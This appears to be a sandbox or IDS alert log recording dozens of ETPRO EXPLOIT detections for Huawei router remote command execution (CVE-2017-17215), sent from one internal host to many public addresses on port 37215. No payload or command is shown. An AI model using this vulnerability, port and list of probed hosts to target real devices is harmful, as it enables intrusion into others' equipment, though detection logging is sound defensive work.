                                                    07/10/24-08:27:31.559678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857437215192.168.2.14157.42.252.9
                                                    07/10/24-08:27:19.222748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5804237215192.168.2.1414.4.119.35
                                                    07/10/24-08:26:53.176697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776237215192.168.2.1419.180.65.167
                                                    07/10/24-08:27:07.255298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030237215192.168.2.14197.145.237.222
                                                    07/10/24-08:27:20.477524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946037215192.168.2.1452.98.237.149
                                                    07/10/24-08:26:48.000164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040237215192.168.2.1441.217.152.247
                                                    07/10/24-08:27:28.124721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4670637215192.168.2.1490.113.51.77
                                                    07/10/24-08:26:25.447222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4896237215192.168.2.14197.146.131.101
                                                    07/10/24-08:26:11.485885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435637215192.168.2.14197.178.199.181
                                                    07/10/24-08:26:53.172944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478437215192.168.2.14157.113.15.116
                                                    07/10/24-08:27:32.600329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182037215192.168.2.14197.143.250.138
                                                    07/10/24-08:27:32.603440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613237215192.168.2.1441.82.220.212
                                                    07/10/24-08:27:22.903697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674237215192.168.2.1471.145.137.220
                                                    07/10/24-08:26:42.463708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491037215192.168.2.1473.120.199.6
                                                    07/10/24-08:27:02.776815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403237215192.168.2.14167.253.190.99
                                                    07/10/24-08:26:43.825233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612237215192.168.2.1441.100.63.201
                                                    07/10/24-08:27:10.751159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037237215192.168.2.1441.125.29.25
                                                    07/10/24-08:27:13.876444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978237215192.168.2.14157.120.247.94
                                                    07/10/24-08:26:34.242773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5404237215192.168.2.14157.186.246.162
                                                    07/10/24-08:27:33.897837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433037215192.168.2.14157.183.214.218
                                                    07/10/24-08:26:13.780678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315037215192.168.2.1441.125.96.130
                                                    07/10/24-08:26:14.777167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5750037215192.168.2.14197.121.131.197
                                                    07/10/24-08:27:31.485057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148637215192.168.2.14157.74.253.48
                                                    07/10/24-08:27:02.980089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563837215192.168.2.1420.84.171.4
                                                    07/10/24-08:26:42.367080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041437215192.168.2.14197.83.223.197
                                                    07/10/24-08:26:45.643057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664037215192.168.2.1451.19.5.88
                                                    07/10/24-08:27:19.160645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434437215192.168.2.14197.224.226.52
                                                    07/10/24-08:27:24.990905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754237215192.168.2.14197.116.94.37
                                                    07/10/24-08:26:14.787511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050437215192.168.2.1441.252.140.196
                                                    07/10/24-08:27:07.362025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717837215192.168.2.14197.149.130.235
                                                    07/10/24-08:27:07.369832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083237215192.168.2.1441.201.122.129
                                                    07/10/24-08:27:30.541025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752437215192.168.2.14157.0.252.168
                                                    07/10/24-08:26:34.228514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048637215192.168.2.14157.170.159.20
                                                    07/10/24-08:26:15.813714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511837215192.168.2.14157.69.78.10
                                                    07/10/24-08:26:38.599918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861637215192.168.2.14197.107.36.159
                                                    07/10/24-08:26:33.171112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636837215192.168.2.14178.132.222.154
                                                    07/10/24-08:26:34.222864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5963237215192.168.2.1441.40.51.49
                                                    07/10/24-08:27:19.230409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539037215192.168.2.14157.16.237.138
                                                    07/10/24-08:26:25.438219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377037215192.168.2.14197.252.172.6
                                                    07/10/24-08:26:41.525899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099037215192.168.2.14222.125.5.168
                                                    07/10/24-08:26:59.528584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885837215192.168.2.14157.139.207.238
                                                    07/10/24-08:27:33.758146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504637215192.168.2.14197.20.181.115
                                                    07/10/24-08:27:22.799638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696237215192.168.2.14197.207.74.175
                                                    07/10/24-08:27:08.399018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932837215192.168.2.14157.229.39.47
                                                    07/10/24-08:27:31.550771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3545037215192.168.2.1441.52.64.162
                                                    07/10/24-08:26:23.332526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012037215192.168.2.14157.11.176.97
                                                    07/10/24-08:26:36.366890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636837215192.168.2.14157.102.23.229
                                                    07/10/24-08:27:22.929011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755437215192.168.2.1413.19.255.210
                                                    07/10/24-08:26:45.663008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023437215192.168.2.14197.89.144.229
                                                    07/10/24-08:27:33.834313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746037215192.168.2.14157.221.203.149
                                                    07/10/24-08:26:45.681028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444037215192.168.2.149.45.243.107
                                                    07/10/24-08:26:28.733035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519237215192.168.2.14139.36.198.56
                                                    07/10/24-08:26:29.851044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517237215192.168.2.14197.139.104.63
                                                    07/10/24-08:27:28.169608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832437215192.168.2.14197.99.237.126
                                                    07/10/24-08:26:45.603299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822637215192.168.2.1446.122.180.152
                                                    07/10/24-08:26:20.085617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454637215192.168.2.14157.122.249.248
                                                    07/10/24-08:26:26.583862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651437215192.168.2.14197.231.212.198
                                                    07/10/24-08:26:53.172651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994837215192.168.2.14157.171.33.138
                                                    07/10/24-08:26:34.202638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849837215192.168.2.14165.145.162.124
                                                    07/10/24-08:26:20.188870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734637215192.168.2.14197.61.254.216
                                                    07/10/24-08:27:33.817300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687437215192.168.2.1441.168.170.167
                                                    07/10/24-08:27:13.963360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3732237215192.168.2.14157.236.140.145
                                                    07/10/24-08:26:23.304428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4804837215192.168.2.1436.92.21.55
                                                    07/10/24-08:26:25.502478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5465837215192.168.2.1441.173.159.5
                                                    07/10/24-08:26:28.809253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716237215192.168.2.14137.249.168.230
                                                    07/10/24-08:26:29.883547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121237215192.168.2.1441.34.26.219
                                                    07/10/24-08:27:14.889190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368637215192.168.2.1420.183.86.84
                                                    07/10/24-08:27:05.237308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388637215192.168.2.14157.38.154.23
                                                    07/10/24-08:26:22.297520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676037215192.168.2.14197.110.52.247
                                                    07/10/24-08:27:13.883057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6094037215192.168.2.14157.94.31.210
                                                    07/10/24-08:27:10.772266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356637215192.168.2.14157.12.76.231
                                                    07/10/24-08:26:18.027380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806637215192.168.2.1423.163.220.142
                                                    07/10/24-08:26:43.910396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359837215192.168.2.14197.208.239.132
                                                    07/10/24-08:27:22.879790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707837215192.168.2.1441.30.223.251
                                                    07/10/24-08:26:17.981659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492237215192.168.2.14157.174.59.43
                                                    07/10/24-08:27:20.515408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840037215192.168.2.1441.175.9.164
                                                    07/10/24-08:27:11.555900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570437215192.168.2.14102.233.251.190
                                                    07/10/24-08:27:23.949605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356237215192.168.2.14197.106.223.45
                                                    07/10/24-08:26:53.150508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355837215192.168.2.14183.123.13.129
                                                    07/10/24-08:27:33.889339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834037215192.168.2.14197.163.244.42
                                                    07/10/24-08:27:17.109836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621237215192.168.2.1465.232.175.92
                                                    07/10/24-08:26:13.646221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154237215192.168.2.14197.81.184.247
                                                    07/10/24-08:27:07.281440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699637215192.168.2.1441.53.65.223
                                                    07/10/24-08:26:49.864771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086437215192.168.2.14197.50.123.37
                                                    07/10/24-08:26:28.916413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.14157.148.111.243
                                                    07/10/24-08:26:43.929800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6081837215192.168.2.14197.97.29.109
                                                    07/10/24-08:27:19.282896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213437215192.168.2.1441.176.192.62
                                                    07/10/24-08:27:24.886736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665237215192.168.2.14197.183.164.146
                                                    07/10/24-08:26:55.385980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654437215192.168.2.1475.150.67.40
                                                    07/10/24-08:26:22.287695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697037215192.168.2.14168.49.177.30
                                                    07/10/24-08:26:29.880668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4591837215192.168.2.14157.148.211.147
                                                    07/10/24-08:27:10.547340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568837215192.168.2.1441.246.17.113
                                                    07/10/24-08:27:32.619838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4151237215192.168.2.14157.204.44.168
                                                    07/10/24-08:27:14.865428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038637215192.168.2.14219.193.211.214
                                                    07/10/24-08:26:14.803775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293837215192.168.2.1441.43.49.90
                                                    07/10/24-08:26:57.570720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474237215192.168.2.14197.121.9.224
                                                    07/10/24-08:26:49.911727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379037215192.168.2.14157.42.142.224
                                                    07/10/24-08:27:13.977821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549637215192.168.2.14197.31.200.2
                                                    07/10/24-08:26:31.093186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3834437215192.168.2.14197.233.128.254
                                                    07/10/24-08:27:31.486586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738837215192.168.2.14155.60.149.37
                                                    07/10/24-08:26:28.927122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3441237215192.168.2.14157.239.55.1
                                                    07/10/24-08:27:27.154416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192437215192.168.2.14157.60.55.207
                                                    07/10/24-08:27:17.056962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240237215192.168.2.14197.199.199.147
                                                    07/10/24-08:27:31.550771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396437215192.168.2.1441.233.196.203
                                                    07/10/24-08:26:36.417901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021237215192.168.2.14197.17.26.56
                                                    07/10/24-08:26:25.477490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499637215192.168.2.14197.78.127.194
                                                    07/10/24-08:26:15.867031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333237215192.168.2.1441.100.152.217
                                                    07/10/24-08:27:17.076959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470237215192.168.2.14171.161.4.238
                                                    07/10/24-08:26:25.497334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141437215192.168.2.1441.130.84.190
                                                    07/10/24-08:26:43.530695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705637215192.168.2.14157.0.136.239
                                                    07/10/24-08:27:27.050359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083037215192.168.2.14157.144.134.201
                                                    07/10/24-08:26:55.308630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985437215192.168.2.14197.220.139.69
                                                    07/10/24-08:26:25.460773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4012037215192.168.2.14204.34.169.70
                                                    07/10/24-08:26:43.561007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4950837215192.168.2.14197.64.156.220
                                                    07/10/24-08:26:49.824955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5596437215192.168.2.14137.193.17.107
                                                    07/10/24-08:27:07.268658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4196237215192.168.2.1435.62.133.144
                                                    07/10/24-08:27:24.837917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744437215192.168.2.1441.157.83.86
                                                    07/10/24-08:26:15.800070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3277437215192.168.2.1441.239.190.70
                                                    07/10/24-08:26:57.536379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022237215192.168.2.1481.165.133.157
                                                    07/10/24-08:26:17.957871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349037215192.168.2.1441.12.21.232
                                                    07/10/24-08:27:17.111438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714237215192.168.2.144.198.157.81
                                                    07/10/24-08:26:22.299377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5906837215192.168.2.14157.220.188.83
                                                    07/10/24-08:27:28.126116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755437215192.168.2.1441.136.134.207
                                                    07/10/24-08:26:49.789175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221637215192.168.2.1436.102.167.225
                                                    07/10/24-08:26:47.766848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551037215192.168.2.14163.82.72.7
                                                    07/10/24-08:27:36.290349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968237215192.168.2.1467.28.184.27
                                                    07/10/24-08:27:30.454516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642037215192.168.2.14197.97.187.213
                                                    07/10/24-08:26:28.723729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469637215192.168.2.14157.146.1.171
                                                    07/10/24-08:26:55.376718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325037215192.168.2.1484.4.38.35
                                                    07/10/24-08:27:32.553741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110637215192.168.2.14168.114.145.163
                                                    07/10/24-08:26:11.661764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103037215192.168.2.14157.50.253.146
                                                    07/10/24-08:26:23.347149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096437215192.168.2.1441.232.187.247
                                                    07/10/24-08:26:38.652814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758437215192.168.2.1473.203.186.220
                                                    07/10/24-08:26:43.742007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405837215192.168.2.1438.28.154.79
                                                    07/10/24-08:26:47.966709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970837215192.168.2.14157.82.87.97
                                                    07/10/24-08:27:23.499663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242637215192.168.2.1441.223.93.222
                                                    07/10/24-08:27:33.744023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738837215192.168.2.14197.87.85.146
                                                    07/10/24-08:26:59.707139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989437215192.168.2.14157.253.210.165
                                                    07/10/24-08:26:59.881196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3767237215192.168.2.14157.234.58.124
                                                    07/10/24-08:27:20.431094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888037215192.168.2.14157.185.53.20
                                                    07/10/24-08:26:43.880984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744037215192.168.2.14197.166.182.149
                                                    07/10/24-08:26:45.638729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725437215192.168.2.1441.235.206.199
                                                    07/10/24-08:26:25.488855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649637215192.168.2.14120.214.124.54
                                                    07/10/24-08:26:33.231407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117437215192.168.2.1441.122.247.128
                                                    07/10/24-08:26:57.660601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766037215192.168.2.14157.100.227.124
                                                    07/10/24-08:27:19.253247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3277037215192.168.2.14197.163.3.210
                                                    07/10/24-08:27:27.085141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986637215192.168.2.1441.238.86.160
                                                    07/10/24-08:26:11.525491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408237215192.168.2.14197.56.126.122
                                                    07/10/24-08:26:11.587895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153637215192.168.2.1441.211.128.190
                                                    07/10/24-08:26:29.883547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366437215192.168.2.1452.134.188.68
                                                    07/10/24-08:26:14.822154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142637215192.168.2.1441.241.29.18
                                                    07/10/24-08:26:29.866986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760637215192.168.2.14157.17.78.243
                                                    07/10/24-08:27:13.822075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321637215192.168.2.14170.110.50.13
                                                    07/10/24-08:26:55.451906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688437215192.168.2.14157.103.9.66
                                                    07/10/24-08:27:19.352801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851437215192.168.2.1441.83.104.101
                                                    07/10/24-08:26:49.921267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937637215192.168.2.14197.103.75.51
                                                    07/10/24-08:27:10.621432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733237215192.168.2.14157.26.233.205
                                                    07/10/24-08:26:22.281648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800037215192.168.2.14157.69.139.102
                                                    07/10/24-08:27:28.176057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935237215192.168.2.1499.129.68.51
                                                    07/10/24-08:27:02.968527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510837215192.168.2.14197.69.64.70
                                                    07/10/24-08:27:28.126957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719037215192.168.2.1441.66.50.73
                                                    07/10/24-08:27:19.321754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333437215192.168.2.1474.221.150.202
                                                    07/10/24-08:26:55.268885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738637215192.168.2.14197.88.120.230
                                                    07/10/24-08:27:19.285425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805237215192.168.2.14149.81.17.197
                                                    07/10/24-08:26:11.622181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854837215192.168.2.1441.209.20.252
                                                    07/10/24-08:26:36.420785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215437215192.168.2.14197.97.218.252
                                                    07/10/24-08:26:49.822276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174237215192.168.2.14197.199.199.46
                                                    07/10/24-08:26:57.623347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316637215192.168.2.1480.245.133.238
                                                    07/10/24-08:27:05.077820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431837215192.168.2.14157.151.176.134
                                                    07/10/24-08:27:13.843143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186837215192.168.2.14200.153.82.199
                                                    07/10/24-08:26:25.454696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852637215192.168.2.1464.75.226.234
                                                    07/10/24-08:27:02.892179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412837215192.168.2.1479.16.246.116
                                                    07/10/24-08:27:27.040022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521037215192.168.2.1441.36.236.247
                                                    07/10/24-08:26:38.658230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056837215192.168.2.1441.23.59.254
                                                    07/10/24-08:26:13.816955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930437215192.168.2.14157.101.103.193
                                                    07/10/24-08:26:47.804395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966637215192.168.2.14157.117.231.251
                                                    07/10/24-08:26:55.379647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939037215192.168.2.1441.19.17.17
                                                    07/10/24-08:26:11.121414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879837215192.168.2.14157.212.168.33
                                                    07/10/24-08:26:26.564654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655237215192.168.2.14197.86.76.24
                                                    07/10/24-08:26:34.196172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5178637215192.168.2.14197.175.11.204
                                                    07/10/24-08:26:23.360757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868037215192.168.2.1464.250.210.238
                                                    07/10/24-08:26:33.231891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4107037215192.168.2.1439.22.125.154
                                                    07/10/24-08:26:57.677011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3405037215192.168.2.14157.137.194.141
                                                    07/10/24-08:27:07.384814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867837215192.168.2.14157.13.199.140
                                                    07/10/24-08:27:20.420210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5419237215192.168.2.14197.95.196.1
                                                    07/10/24-08:27:22.839204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812837215192.168.2.14197.186.182.196
